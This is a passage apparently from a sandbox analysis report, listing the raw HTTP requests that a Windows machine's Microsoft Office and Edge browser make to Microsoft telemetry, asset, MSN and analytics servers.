            Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1Host: assets2.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733607521&P2=404&P3=2&P4=PMAz2jVPGb8vylg6tZdShGhhfmpj18R3Ev3wDgE0RCiMRNqPAjLyreqztll31eD0%2blpHBeJcTGUeWI%2fll8QPtg%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: EhSDf3v4MOhFxwOdUaBNFtSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /b?rn=1733002729077&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2A00BA3058306B91366DAF7759986AB6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=2A00BA3058306B91366DAF7759986AB6&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=8810299700620392370&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=2bb5e59f50de43f7beef8428609df6ac HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=2A00BA3058306B91366DAF7759986AB6; _EDGE_S=F=1&SID=3DD5691DFF4E6D4327747C5AFE686C97; _EDGE_V=1
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /b2?rn=1733002729077&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2A00BA3058306B91366DAF7759986AB6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1B0c09bfdb4875be38be8541733002730; XID=1B0c09bfdb4875be38be8541733002730
            Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
